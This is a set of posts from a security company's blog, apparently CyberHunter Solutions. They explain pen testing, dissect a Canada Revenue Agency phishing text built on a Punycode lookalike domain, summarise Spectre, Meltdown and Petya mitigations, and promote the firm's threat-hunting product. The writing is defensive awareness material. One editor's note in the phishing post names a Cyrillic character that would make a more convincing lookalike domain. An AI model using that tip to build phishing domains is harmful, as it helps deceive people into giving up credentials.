Pen Testing – Confusion or Clarity?

By | Uncategorised

Today I want to discuss (and hopefully clarify) some recent confusion I have been observing around pen testing (penetration testing) requests.  On one hand, we are seeing more and more requests for this type of security service, which is a great thing.  It means cybersecurity awareness is growing, and people are looking to take the next steps to ensure that they aren’t the next headline about a network breach.  On the other hand, we are also starting to see the term “pen testing” used as a catch-all for a few different security services.

First, a couple of definitions…

Vulnerability Assessment (VA):  This is typically an automated scan of network equipment that identifies and reports on theoretical vulnerabilities in things like computer operating systems, installed applications, websites, databases, network services, etc.  In plain terms, if we imagine that your application or network is a locked door, a vulnerability assessment tries to identify all the possible locks that exist on the door.

Penetration Test:  Generally speaking, this is an authorized attempt by an ethical hacker (or Red Team) to exploit identified weaknesses (or vulnerabilities) in order to gain access to a network, an application or an organization.  In other words, a penetration tester has a big bag of “keys” (i.e. tools, techniques, and procedures) and they will attempt to open each theoretical lock or vulnerability with their “keys”.

Now, back to some recent observations…

One of the first things we do at CyberHunter is to try and understand what our clients really mean when they say “I need a pen test”.  Usually, the request falls into one of two camps:

Scenario #1:  “We have a web application and one of our biggest clients need us to get a 3rd party pen test performed for their risk team”.

Scenario #2: “We are looking to test and improve our overall cybersecurity posture and we need an ethical hacker to try to break into our network.”

These are generalizations, but Scenario #1 is actually MOSTLY a vulnerability assessment, followed by a blend of automated and manual testing that looks for obvious configuration flaws or vulnerabilities that can be exploited without too much effort.   The main goal of this type of test is to get a remediation report on the issues that let you harden your website, application or network.  This type of testing could also be considered an audit of sorts, particularly when a specific set of metrics are used for compliance measurement (e.g. PCI-DSS compliance).

Scenario #2, however, is a more traditional penetration test.  This type of pen test (also called a Red Team exercise) simulates an adversarial role and is a far more realistic way to test the security readiness of an organization.  This testing covers exploitation attempts against People, Process, and Technology.  It can involve a significant amount of social engineering and usually triggers active security controls and countermeasures inside the operating environment.  These tests will additionally assess internal Blue Team (the defensive team) responsiveness and/or process in the event of an intrusion detection.

Whether you need a Scenario #1 or Scenario #2 engagement, at CyberHunter, we are very happy to see the industry taking proper steps towards a well-balanced cyber hygiene program.  Contact us at evolve@cyberhunter.solutions to take those next steps.

Real Phishing Attack – Canada Revenue Agency Example

By | Uncategorised

I received a mysterious text message the other day, apparently from the Canada Revenue Agency (CRA) telling me to “complete your form, and give us 10 working days to process your claim”. Of course, I always like to observe cyber attack attempts like this first hand to see how complex (or not) the phishing is getting. This one was interesting and is a good lesson on how to spot a phish.

First, there was the message itself, and the exposed URL:

Other than the fact that CRA doesn’t text message you (that I know of), there were some other signs.

First, the phishing link had a French accent in it, which was unusual in a couple of ways.   When a web browser is faced with an accented character (Unicode) in the hostname like café.com, it needs to decode it from Unicode (which is the visually correct looking word) to Punycode (an ASCII representation containing only Letters, Digits and Hyphens – LDH) in order to allow a DNS server to understand it.  Domain Name System services only use ASCII in their records.  (NOTE: IDNA – Internationalizing Domain Names in Applications encoding exists so web browsers can translate any international domain name (for example, one with accents or double-byte characters) into a recognizable ASCII domain.  These domains are first translated to Punycode and then have a prefix of “xn--” appended to the front of the record.  As an example, the Russian top-level domain extension is “рф” which is “xn--p1ai” in IDNA).

So the URL in the text message,

gets translated from the semi-legitimate looking URL you see, to the following below:

Obviously, if you saw the DECODED domain in ASCII Punycode (shown on the right in the above image), it would look strange and you likely wouldn’t click it.  But an accented letter in a URL is actually a good way for an attacker to get a phishing domain that looks reasonably legit.  (EDITORS NOTE:  the Unicode character U+0430 is a small Cyrillic “a” and would have been a better choice than the accented “a”).  Anyhow, the accent in the string “interac” raised flag #1.

So, the domain that is shown on the left (with the accent) doesn’t actually exist “as-is” because as I mentioned, the Domain Name System does not allow for non-ASCII records.  The domain on the right does exist, however (even though the site has since been suspended).  A little bit of research into the “real” Punycode domain shows that it is hosted at Namecheap Inc.  This is a discount hosting provider where you can get a hosted server for about $1 per month….another telltale sign of phishing or malware….hackers can be very cheap!

Finally, the most important item that people need to be aware of is WHERE to look in the URL to determine if it is a phish.  In the example of the Punycode URL sent to me, there is a string in the text message that had “cra-arc.gc.ca” in the URL. This is actually the real domain for the Canada Revenue Agency.  So where to look??

Some Examples:

In the example httx://abc-555.xyz.def.com/1234-mno.pqr.com, you need to focus on “DEF.COM”.  This is the top-level domain of the web server…and you are ultimately going to a location that is theoretically owned by the owners of “DEF.COM”.

In another example, httx://abc.123.mnop.com, the top-level domain is “MNOP.COM”.

The rule of thumb for how to identify the top-level domain is:

  • look at the first two fields, separated with a dot, that are located to the left of the first single forward slash, OR
  • look at the first two fields, separated with a dot, that are at the end of the URL (if there is no single forward slash.

When you have these items, assess if this looks like a real domain.  Of course, this doesn’t completely protect you.  Mainly because the real domain may have been compromised and the owners don’t know it yet, or you just don’t know if the domain is real or not.  When in doubt, always choose NOT to click the link!!

One final point…email phishing attacks are still, by far, the number one method of successful cyber attack because they work.  If you are interested in learning how to properly defend against phishing attacks for your company, contact us at evolve@cyberhunter.solutions.  We can help you eliminate the number one method of successful cyber attack in less than the time you spent reading this blog post.

UPDATE: Spectre and Meltdown Mitigation Steps

By | Uncategorised

Two steps you can do right now to help protect you from Spectre and Meltdown:

  1. Verify if new Windows protections are enabled:

    Microsoft’s update process for Windows has been complicated by compatibility issues with quite a few antivirus solutions, making it more difficult for admins to confirm whether their organizations’ machines are protected or not.   To help check, Microsoft has provided a PowerShell script that system administrators can run to verify whether the security updates are in fact installed properly.  Check it out on the Microsoft Support site HERE.

  2. Install browser updates and turn on site isolation

    According to vulnerability researchers, the most likely exploitations of Spectre are web-based attacks using JavaScript to leak information cached in the browser. Mozilla has already issued Firefox version 57.0.4, which includes mitigations for these attacks.  As stated in the last post, Google has announced patches will be included in its next Chrome update scheduled for January 23. In the meantime, both Chrome and Firefox users are advised to turn on site isolation, which can help prevent a site from stealing data from another site.

Spectre and Meltdown

By | Uncategorised

Lots of excitement today as EVERY security company is endlessly discussing Spectre and Meltdown, the exploits affecting almost all systems out there.  Here is the long and short (non-technical) summary of things:

  • Spectre – The name is coined from the term “speculative execution”, and the fact that it will “haunt” us for a long time to come.
  • Meltdown – This name is a reference to how it operates (i.e. it “melts” or destroys the isolation protection that prevents applications from accessing random memory locations).
  • Spectre (CVE-2017-5753 and CVE-2017-5715) affects almost every system with a CPU (laptops, desktops, servers, and even ARM-based devices like smartphones).  Effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of said best practices actually increase the attack surface and may make applications more susceptible to Spectre.  Spectre is harder to exploit than Meltdown, but it is also harder to mitigate.
  • Meltdown (CVE-2017-5754) is more specific to Intel CPUs and systems running software-based virtualization like Xen PV or Docker where there is the sharing of a single host’s kernel.  This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system.  If your computer has a vulnerable processor and runs an unpatched operating system, it is not safe to work with sensitive information without the chance of leaking the information.
  • Can Spectre and/or Meltdown be detected?  Probably not…at least not easily. The exploitation does not leave any traces in traditional log files.  It is possible (in theory) that antivirus will be able to detect / block these attacks in the future, but at the moment it is very difficult to distinguish the difference Meltdown and Spectre versus benign applications.  Javascript is also capable of exploiting these vulnerabilities, so web browsing is now also a risk.  However, Mozilla has released some tweaks and suggestions to harden the browser making it more difficult.  Chrome will apparently be issuing a patch on Jan 23rd.
  • Is there a workaround / fix?  There are patches for Windows, Linux and OSX for Meltdown…a simple Google Search will find them.  For Spectre, as it is quite a bit harder to mitigate, there is no patch per se (outside of CPU replacement), but hardening procedures are being worked on to prevent future exploitation.  As this is all quite new, keep monitoring the security blogs for the latest updates on patches, hardening methodologies, and more information.

End of Year Vulnerability Assessments, Pen Tests or Security Compliance Audits?

By | Uncategorised

If you are like many businesses, you may be looking for a quick security assessment of your website, network perimeter, or even your network infrastructure (firewalls, routers, VPNs, etc.).  CyberHunter Solutions is offering rapid vulnerability assessments, penetration tests and security compliance audits for your company.  In most cases these audits can be performed in a single day and provide you with an informative report and peace of mind that you don’t have any obvious gaps in your security settings, application security or device security.

Our vulnerability reporting flavours cover PCI Compliance (certified or pre-audit), ISO 27001/2, SANS, OWASP, CIS, and of course the details around best practices.  If you are about to have a compliance audit, let us come in and do a pre-audit of your infrastructure or endpoints.  We cover compliance areas like Center for Internet Security (encompassing FISMA, HIPAA, PCI, etc.), NIST, US DoD DISA STIG Checklists, SANS, NERC CIP and we can even measure your network against the Open Vulnerability Assessment Language (OVAL) Information Assurance Metrics.

As a Canadian company we are offering additional discounted rates to any clients in the Toronto, Ottawa and Montreal areas.

The Hunt for “Non-Malware”

By | Uncategorised

During a recent penetration test at a client in the Toronto area, we were asked about “non-malware” attacks in the enterprise, and how to spot them.  For those not familiar with “non-malware”, it is an attack that leverages existing software, trusted applications and permitted protocols to perform malicious activities.  On top of that, these types of attacks can typically bypass Anti-virus checks as they are file-less and memory-based attacks that further complicate the job of security controls.

An example of this is the usage of PowerShell.  Nearly every single malicious hacking activity imaginable can be executed using PowerShell in a Windows environment.  Although this tool is the best friend of sysadmins and threat hunters alike, it will also allow malicious activities such as privileged escalation, lateral movement, credential theft, data exfiltration, establishment of persistence, data tampering, etc.  To make things quite a bit worse, an attacker can inject the required .NET assemblies directly into Windows system memory, allowing PowerShell functionality even if the PowerShell executable (powershell.exe) has been removed or blocked throughout the network.

Another nasty example (as discussed recently by the Cisco threat intel team Talos) is a recent Brazilian banking trojan that exploited a fundamental flaw in many security products…the security trust chain.  Basically, many endpoint security solutions assume that if the first executed binary in an application is a trusted one, then any subsequent libraries and dependencies that are called by the “trusted binary” must also be trusted.

In this case, a user clicks the wrong HTML link and a few re-directs later, a trusted VMWare PNG file gets used in the attack sequence which calls a malicious DLL (vmwarebase.DLL) that was able to inject more malicious code into explorer.exe which then allowed the trojan to kill various analyst processes like taskmgr.exe and establish autorun persistence, letting the trojan do its job of targeted web injects that were focused on people navigating their banking websites at specific Brazilian banks (yes…lot’s of complex steps to this one and this is the abbreviated version).  Now, this attack STILL came in the usual way…a phishing email with an attachment….and it should have been filtered or the end user should know better than to click an HTML attachment, but that’s another story.

The main takeaway here is that, once an attacker has successfully penetrated your network, if you don’t continuously hunt for the things that are successfully evading your traditional security tools and monitoring solutions, you may be in for a nasty surprise.

These things CAN be detected, and as part of a thorough cyber-hygiene program, regularly scheduled threat hunting is the way to do it.  Whether it is PowerShell script-blocks or latent binaries hiding in memory for months on end, a threat hunt is an excellent way to enhance a vulnerability assessment or penetration testing engagement.  Augmenting a VA / Pen Test with a cyber threat hunt brings actual operational risk measurement to these necessary, but theoretical activities.

Hunt often, and start today.

Threat Hunting – As Easy as Alpha, Bravo, Charlie

By | Uncategorised

There are a many reasons WHY organizations need threat hunting as a service, but the number one reason is that DEFENSE IN DEPTH DOES NOT WORK PERFECTLY.  I know that we all love to talk about defense in depth as if that somehow, by adding enough defensive layers to the organization (i.e. the perimeter, the network, the hosts, the applications or even the data), every single attack will be stopped.  I mean, the concept of defense in depth was created by the NSA, so it has to be good, right?  How’s that been working out?

Of course, we NEED defense in depth.  I am not saying we don’t.  It is a best practice strategy for achieving information assurance, and it simply has to be done.  However, the evidence is quite clear that malware and APTs will still get through your defenses…no matter who you are, and no matter how many layers you have protecting your network.  Just when we think our collective lips are above the waterline, a new attack or exploit is identified and some poor organization is all over the news with a very public breach.  I just love the phrase “next-generation” when people describe yet another cyber security silver bullet, because it implies that the previous generation didn’t do such a hot job….which of course it didn’t.

Anyhow, if you are an average enterprise in North America, then malware will typically sit inside your network for 6 to 8 months before someone (usually someone external) will find it.  This is called the breach detection gap, and it can be narrowed if you acknowledge four simple guiding principles:

  1. Malware and APTs will breach your defenses.
  2. Never trust an endpoint unless you can prove it should be trusted.
  3. Established trust in an endpoint is a very temporary thing.
  4. Validate endpoints as malware-free, anytime, anyplace with Securitybox.

The Securitybox comes in three configurations (Alpha, Bravo, and Charlie) and can meet the scalability needs of any enterprise threat-hunting requirement:

Alpha: Focusing exclusively on the endpoints (Windows and Linux systems and servers) using agentless technology, this Securitybox configuration is for those who want to manually launch large-scale, on-demand (or scheduled) cyber threat hunts within their network.

Bravo: Designed for those enterprise customers looking for a zero-touch automated cyber threat hunting experience, the Bravo configuration of Securitybox adds an advanced packet analysis engine that monitors network traffic 24/7 looking for anomalous endpoint communication activity (e.g. beaconing, protocol tunneling, exfiltration, etc.). Upon detection of the suspicious network traffic activity, it will immediately launch an agentless endpoint cyber threat hunt that will analyze and validate the suspicion with no false positives.

Charlie: Designed for security analysts and cyber threat hunters who require a full-stack situational awareness of their network, Charlie configuration expands the Securitybox capability by adding access to a visually rich Cyber Intelligence Portal. The Charlie configuration allows analysts to easily explore and query their data, taking cyber threat hunting to the next level.

Practice good cyber hygiene with Securitybox.

Securitybox-Charlie Screenshots

SecurityBox Launches in North America

By | Uncategorised

CyberHunter Solutions is excited to announce the launch of its SecurityBox (http://securitybox.io) cyber threat hunting solution.  Now available in North American and Europe, the SecurityBox is a highly-scalable, agentless threat hunter that can detect and identify latent malware, advanced persistent threats and network breaches BEFORE they become an active attack within the enterprise.

SecurityBox specifically hunts for malware that has successfully evaded existing defences and has established a beachhead within network endpoints, including user devices (laptops, desktops) and servers.  For the first time, reduce malware lifespans in the enterprise from months to minutes.

SecurityBox is available as a fully-managed cyber threat hunting service, or as a DIY solution for internal IT and IT-Security teams.  It can be deployed in minutes as a physical or virtual appliance to meet the needs of the environment.

Designed around the following four principles, SecurityBox provides network owners an ability to quantify TRUE risk by finally understanding their breach detection gap times:

  1. Accept that malware and APTs will breach existing defences, no matter who you are, because cyber security is never perfect.

  2. Always treat endpoints and devices as untrusted, until it can be proven otherwise.

  3. Trust that is established in an endpoint is both finite and fleeting.  Hunt frequently.

  4. Anyone can validate endpoints as malware-free, anytime, anyplace with SecurityBox.

Contact us today to find out about our 90-day threat hunt special offer… evolve@cyberhunter.solutions

WTF – Global IT Leaders are “Safe and Confident” in Perimeter Security?

By | Uncategorised

(Ed:  Keep reading to the end as there is a challenge being offered to any doubters)

I just finished reading an article by Infosecurity Magazine and I guess I have to say that I am somewhere between stunned / shocked /amused, and not at all surprised at the content.  Apparently, the magazine polled 1,000 global IT leaders and asked them if “their perimeter security was effective in keeping unauthorized users out of their network”.  Apparently, 94% of these IT leaders feel their perimeter security IS effective.  In the UK, this number climbs to 96%, with a whopping 58% feeling “extremely confident” in the strength of their perimeter.

Now to be fair, the article also says that another finding of the research was that “68% of respondents claimed that unauthorized people could access their network”.  So now I am confused.  Confident in their perimeter security while unauthorized people are accessing their network.  Hmmmm.

After laughing for a while, I had to stop and think….is this so unusual?  Isn’t this the whole reason that we hear about breach after breach after breach every single day?  Isn’t this overconfidence (or ignorance, or gross negligence, or whatever you want to call sticking your head in the sand like an ostrich) why enterprise organizations are constantly under attack?

How can any organization of size be “extremely confident” that their perimeter security will save them?

Perhaps there are a couple obvious answers:

(1) The IT leaders do not know if they have been breached.  I am quite sure there are a lot of IT leaders in this category.  I have met many of them and they spout the “it hasn’t happened to us” or “it hasn’t hurt us so far” mantra.

Since the average malware dwell time in the network sits somewhere between 3 and 6 months (and over a year in the EMEA region), this would seem to be an accurate observation.  Furthermore, I am not sure they have the tools to actually hunt down the malware that hides in the network, so even if they wanted to know if they were breached, it would be a challenge.

(2) They aren’t acknowledging (or don’t know) that perimeter security is only a very minor part of the overall picture.  Like any successful business structure, proper IT security consists of people, process and controls….and when I say controls, I am talking about a VERY layered set of technologies that have been properly configured to take into account both what it is they are defending (e.g. financial data in a database) and how it impacts their business operations.

Security controls MUST be fully aware of the environment they protect.  At a minimum, they must watch both network communications and endpoint behavior.  IT Sec teams must have the tools necessary to ensure that they do not normalize deviancy in the network.  Identify the suspicious and confirm it so you have high confidence in your response.

Furthermore, and this is just talking about the perimeter that makes these people so comfortable, they must treat every single incoming communication as a potential attack against their network.  As one example, if these IT leaders do not neutralize EVERY SINGLE incoming email (including the neutralization of active content in attachments and embedded links) then they do not even have perimeter security.  Approximately 94% of all cyber attacks come in through email.  So if you don’t thoroughly inspect and neutralize it all with CDR, then you don’t really have a perimeter.

Anyhow, perhaps these IT leaders were misquoted or their answers were taken out of context, but I am not so sure. I suppose time will tell if they become the next headline.

So, as a challenge to any IT leader who believes their network is malware-free and they have not yet been breached (possibly because of exceptional perimeter security), CyberHunter Solutions will perform a forensic endpoint investigation of up to 100 Windows or Linux endpoints at no cost.  If you are lucky enough to get a clean bill of health for your network, then you will have the evidence to prove you are doing a great job!  However, you may be quite surprised at what you find hiding inside your enterprise.

Quick Protection from Petya

By | Uncategorised

Just a few quick words on the Petya ransomware as I am sure you have heard enough noise about it:

  • We still believe that it initially enters the network via a phishing email, SO CLEAN YOUR EMAIL WITH CDR
  • Do NOT pay ransom for this as it is unlikely you will be able to reach your attacker as their email accounts have been suspended
  • Even if you are patched against the EternalBlue exploit (MS-017-10), there is still likelihood of lateral propagation as it uses WMIC and PSEXEC to worm through the network.  You need to hunt down this malware immediately.
  • The malware looks for the presence of a specific file called “C:\Windows\Perfc” and it terminates if it exists. So it may be a good idea (for now) to create a dummy file with that name as a short-term protection.  Of course, until it morphs to something else.